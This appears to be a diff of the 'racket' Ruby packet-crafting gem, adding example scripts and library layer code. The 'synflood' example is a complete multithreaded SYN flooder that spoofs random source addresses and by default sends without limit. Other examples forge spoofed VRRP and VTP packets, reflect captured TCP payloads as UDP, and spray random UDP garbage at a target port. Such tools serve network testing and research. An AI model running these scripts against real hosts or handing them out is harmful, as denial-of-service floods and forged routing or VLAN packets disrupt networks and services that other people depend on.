racket 1.0.10

data/examples/stp-send

@@ -0,0 +1,21 @@
+#!/usr/bin/env ruby
+#
+# $Id: stp-send 174 2010-08-21 22:26:52Z jhart $
+#
+
+require 'rubygems'
+require 'racket'
+
+include Racket
+n = Racket::Racket.new
+n.iface = "eth0"
+
+n.layers[2] = L2::EightOTwoDotThree.new
+n.layers[3] = L2::LLC.new()
+n.layers[4] = L2::SNAP.new()
+n.layers[4].pid = 0x010b
+
+n.layers[5] = L3::STP.new()
+n.layers[5].version = 2
+
+n.sendpacket

data/examples/synflood

@@ -0,0 +1,147 @@
+#!/usr/bin/ruby
+# $Id: synflood 174 2010-08-21 22:26:52Z jhart $
+# Simple SYN flooder with randomness built in, using Racket
+# Use at your own risk
+# 
+# Jon Hart <jhart@spoofed.org>
+
+require 'rubygems'
+require 'racket'
+require 'monitor'
+require 'optparse'
+require 'ostruct'
+
+include Racket
+
+class Options
+  def self.parse(name, args)
+    options = OpenStruct.new
+    options.verbose = false
+    options.srcport = nil 
+    options.dstport = nil
+    options.srcip = nil
+    options.dstip = nil
+    options.packets = nil
+    options.threads = 1
+
+    opts = OptionParser.new do |opts|
+      opts.banner = "#{File.basename(name)}"
+      opts.banner += "Usage: #{name} [options]"
+
+      opts.on("--srcip SOURCEIP", "Source IP address (default: random)") do |o|
+        options.srcip = o
+      end
+
+      opts.on("--dstip DESTIP", "Destination IP address (required)") do |o|
+        options.dstip = o
+      end
+
+      opts.on("--srcport SRCPORT", "Source port (default: random)") do |o|
+        options.srcport = o.to_i
+      end
+
+      opts.on("--dstport DSTPORT", "Destination port (default: random)") do |o|
+        options.dstport = o.to_i
+      end
+
+      opts.on("--threads NUMTHREADS", "Number of writing threads (default: 1)") do |o|
+        options.threads = o.to_i
+      end
+
+      opts.on("--packets NUMPACKETS", "Number of packets to send (default: infinite)") do |o|
+        options.packets = o.to_i
+      end
+      opts.on_tail("-h", "--help", "Show this help message.") { puts opts; exit }
+    end
+
+
+    begin
+      opts.parse!(args)
+    rescue OptionParser::ParseError => e
+      puts "#{e}\n\n#{opts}"
+      exit(1)
+    end
+    options.help = opts
+    options
+  end
+end
+
+@options = Options.parse($0, ARGV)
+
+if (@options.dstip.nil?) 
+  puts "Destination IP required"
+  puts @options.help
+  exit(1)
+end
+
+
+@p = Racket::Racket.new
+@p.iface = "eth0"
+
+@p.l3 = L3::IPv4.new
+@p.l3.src_ip = @options.srcip.nil? ? "0.0.0.0" : @options.srcip
+@p.l3.dst_ip = @options.dstip.nil? ? "0.0.0.0" : @options.dstip
+@p.l3.protocol = 6
+
+@p.l4 = L4::TCP.new
+@p.l4.dst_port = @options.dstport.nil? ? 0 : @options.dstport
+@p.l4.src_port = @options.srcport.nil? ? 0 : @options.srcport
+@p.l4.flag_syn = 1
+
+t1 = Time.new
+i = 0
+
+class Flood < Monitor
+  attr_reader :count
+  def initialize
+    @count = 0
+    super
+  end
+
+  def flood(packet, options)
+    @packet = packet
+    @options = options
+    begin
+      if ( (! @options.packets.nil?) && @options.packets < @count)  
+        break
+      end
+
+      if (@options.srcip.nil?)
+        @packet.l3.src_ip = L3::Misc.long2ipv4(rand(2**32))
+      end
+
+      if (@options.srcport.nil?)
+        @packet.l4.src_port = 1024 + rand(65535-1024)
+      end
+
+      if (@options.dstport.nil?)
+        @packet.l4.dst_port = 1024 + rand(65535-1024)
+      end
+
+      @packet.l4.fix!(@packet.l3.src_ip, @packet.l3.dst_ip, "")
+
+      synchronize do
+        @count += 1
+        @packet.sendpacket
+      end
+    end while (true)
+  end
+end
+
+
+t1 = Time.new
+f = Flood.new
+threads = []
+(1.upto(@options.threads)).each do |t|
+  threads << Thread.new { f.flood(@p, @options) }
+end
+
+threads.each do |t|
+  t.join
+end
+t2 = Time.new
+
+time = t2 - t1
+
+puts "Sent #{f.count} packets in #{time} seconds (#{"%.0f" % (f.count/time).to_f} pps)"
+

data/examples/tcp

@@ -0,0 +1,43 @@
+#!/usr/bin/env ruby
+#
+# $Id: tcp 172 2010-03-16 07:07:04Z jhart $
+#
+# Send a DNS request
+
+require 'rubygems'
+require 'racket'
+
+include Racket
+unless (ARGV.size == 3) 
+  puts "Usage: #{$0} <srcip> <dstip> <domain>"
+  exit
+end
+
+n = Racket::Racket.new
+n.iface = "eth0"
+
+n.l3 = Racket::L3::IPv4.new
+n.l3.src_ip = ARGV[0] 
+n.l3.dst_ip = ARGV[1]
+n.l3.protocol = 0x6
+
+n.l4 = Racket::L4::TCP.new
+n.l4.src_port = 48484
+n.l4.seq = 0xabcdef
+n.l4.ack = 0xfedcba
+n.l4.flag_ack = 1
+n.l4.flag_psh = 1
+n.l4.dst_port = 53
+n.l4.window = 4445
+
+n.l5 = Racket::L5::DNS.new
+n.l5.tx_id = 1234
+#n.l5.add_question(ARGV[2], 1, 1)
+n.l4.add_option(2, "\xff\xee")
+n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, n.l5)
+
+f = n.sendpacket
+n.layers.compact.each do |l|
+  puts l.pretty
+end
+puts "Sent #{f}"

data/examples/tcp2udp

@@ -0,0 +1,65 @@
+#!/usr/bin/env ruby
+#
+# $Id: tcp2udp 174 2010-08-21 22:26:52Z jhart $
+#
+#
+# Spew TCP packets back at the source but in UDP form.  Gross.
+# Pointless.
+
+
+require 'rubygems'
+require 'pcaprub'
+require 'racket'
+
+include Racket
+
+
+if (ARGV.size < 1)
+  puts "Usage: #{$0} <iface> [filter]"
+  exit
+end
+
+begin
+  p = Pcap::open_live(ARGV[0], 1500, true, 1000)
+  unless (ARGV[1].nil?)
+    p.setfilter(ARGV[1])
+  end
+rescue Exception => e
+  puts "Pcap: Cannot open device #{ARGV[0]}: #{e}"
+  exit
+end
+
+p.each do |pkt|
+  if (p.datalink == Pcap::DLT_EN10MB) 
+    eth = L2::Ethernet.new(pkt)
+    case eth.ethertype
+      when 0x0800:
+        orig_ipv4 = L3::IPv4.new(eth.payload)
+        if (orig_ipv4.protocol == 6) 
+          n = Racket::Racket.new
+          orig_tcp = L4::TCP.new(orig_ipv4.payload)
+          
+          if (!orig_tcp.payload.nil?)
+            n.l3 = L3::IPv4.new
+            n.l4 = L4::UDP.new
+            n.l4.src_port = orig_tcp.dst_port
+            n.l4.dst_port = orig_tcp.src_port
+            n.l3.src_ip = orig_ipv4.dst_ip
+            n.l3.dst_ip = orig_ipv4.src_ip
+            n.l3.protocol = 17
+
+            n.l4.payload = orig_tcp.payload
+            n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
+
+            f = n.sendpacket
+            puts "Sent #{f}"
+            n.layers.compact.each do |l|
+              puts l.pretty
+            end
+            exit
+          end
+        end
+    end
+  end
+end
+# vim: set ts=2 et sw=2:

data/examples/udp

@@ -0,0 +1,46 @@
+#!/usr/bin/env ruby
+#
+# $Id: udp 174 2010-08-21 22:26:52Z jhart $
+#
+# Send random garbage to a UDP port 
+
+require 'rubygems'
+require 'racket'
+
+include Racket
+unless (ARGV.size == 4) 
+  puts "Usage: #{$0} <srcip> <dstip> <dst_port> <size>"
+  exit
+end
+
+# create a new Racket object and pick an interface
+n = Racket::Racket.new
+n.iface = "eth0"
+
+# skip right to layer3, layer2 will be done automatically
+# build a new IPv4 layer, and assign src and dst ip from the command line
+n.l3 = L3::IPv4.new
+n.l3.src_ip = ARGV[0] 
+n.l3.dst_ip = ARGV[1]
+n.l3.protocol = 0x11
+
+# tack on UDP
+n.l4 = L4::UDP.new
+# randomize source port
+n.l4.src_port = 1024 + rand(65535-1024)
+# take destination port from the commandline
+n.l4.dst_port = ARGV[2].to_i
+# build a random amount of garbage for the payload
+n.l4.payload = Misc.randstring(ARGV[3].to_i)
+
+# fix 'er  up (checksum, length) prior to sending
+n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
+
+# off you go
+f = n.sendpacket
+
+# print out what we built
+n.layers.compact.each do |l|
+  puts l.pretty
+end
+puts "Sent #{f}"

data/examples/vrrp

@@ -0,0 +1,34 @@
+#!/usr/bin/env ruby
+#
+# $Id: vrrp 174 2010-08-21 22:26:52Z jhart $
+#
+
+require 'rubygems'
+require 'racket'
+
+include Racket
+unless (ARGV.size == 3) 
+  puts "Usage: #{$0} <srcip> <dstip> <type>"
+  exit
+end
+
+n = Racket::Racket.new
+n.iface = "eth0"
+
+n.l3 = L3::IPv4.new
+n.l3.src_ip = ARGV[0] 
+n.l3.dst_ip = ARGV[1]
+n.l3.protocol = 112
+
+n.l4 = L4::VRRP.new
+n.l4.type = ARGV[2].to_i
+n.l4.auth_type = 1
+n.l4.add_ip("1.2.3.4")
+n.l4.add_auth("haha")
+#n.l4.payload = [ L3::Misc.ipv42long("1.2.3.4") ].pack("N")
+
+f = n.sendpacket
+n.layers.compact.each do |l|
+  puts l.pretty
+end
+puts "Sent #{f}"

data/examples/vtp

@@ -0,0 +1,28 @@
+#!/usr/bin/env ruby
+#
+# $Id: vtp 174 2010-08-21 22:26:52Z jhart $
+#
+# Send amusing CDP packets
+require 'rubygems'
+require '../lib/racket'
+
+include Racket
+n = Racket::Racket.new
+n.iface = "eth0"
+
+n.layers[2] = L2::EightOTwoDotThree.new(Misc.randstring(14))
+n.layers[2].dst_mac = "01:00:0c:cc:cc:cc"
+n.layers[3] = L2::LLC.new()
+n.layers[4] = L2::SNAP.new()
+n.layers[4].pid = 0x2003
+
+n.layers[5] = L2::VTPSubsetAdvertisement.new
+n.layers[5].version = 1
+n.layers[5].revision = 12345
+n.layers[5].add_vlan_info(0xFF, 3, 5, 6, 7, "blafadfadsfasdf")
+
+n.layers.compact.each do |l|
+  puts l.pretty
+end
+
+n.sendpacket

data/lib/racket.rb

@@ -0,0 +1,4 @@
+module Racket
+end
+
+require 'racket/racket'

data/lib/racket/l2.rb

@@ -0,0 +1,30 @@
+# $Id: l2.rb 14 2008-03-02 05:42:30Z warchild $
+#
+# Copyright (c) 2008, Jon Hart 
+# All rights reserved.
+# 
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#     * Redistributions of source code must retain the above copyright
+#       notice, this list of conditions and the following disclaimer.
+#     * Redistributions in binary form must reproduce the above copyright
+#       notice, this list of conditions and the following disclaimer in the
+#       documentation and/or other materials provided with the distribution.
+#     * Neither the name of the <organization> nor the
+#       names of its contributors may be used to endorse or promote products
+#       derived from this software without specific prior written permission.
+# 
+# THIS SOFTWARE IS PROVIDED BY Jon Hart ``AS IS'' AND ANY
+# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL Jon Hart BE LIABLE FOR ANY
+# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+Dir.glob(File.join(File.dirname(__FILE__), 'l2/*.rb')).each { |f| require f }
+
+# vim: set ts=2 et sw=2:

data/lib/racket/l2/eightotwodotthree.rb

@@ -0,0 +1,48 @@
+# $Id: eightotwodotthree.rb 14 2008-03-02 05:42:30Z warchild $
+#
+# Copyright (c) 2008, Jon Hart 
+# All rights reserved.
+# 
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#     * Redistributions of source code must retain the above copyright
+#       notice, this list of conditions and the following disclaimer.
+#     * Redistributions in binary form must reproduce the above copyright
+#       notice, this list of conditions and the following disclaimer in the
+#       documentation and/or other materials provided with the distribution.
+#     * Neither the name of the <organization> nor the
+#       names of its contributors may be used to endorse or promote products
+#       derived from this software without specific prior written permission.
+# 
+# THIS SOFTWARE IS PROVIDED BY Jon Hart ``AS IS'' AND ANY
+# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL Jon Hart BE LIABLE FOR ANY
+# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+#
+module Racket
+module L2
+# 802.3 Ethernet.  Should always be followed by an LLC header
+class EightOTwoDotThree < RacketPart
+  # Destination MAC address
+  hex_octets :dst_mac, 48
+  # Source MAC address
+  hex_octets :src_mac, 48
+  # Length of the payload 
+  unsigned :length, 16
+  # Payload
+  rest :payload
+
+  # Fix this layer up prior to sending.  For 802.3, just adjusts +length+
+  def fix!
+    self.length = self.payload.length
+  end
+end
+end
+end
+# vim: set ts=2 et sw=2: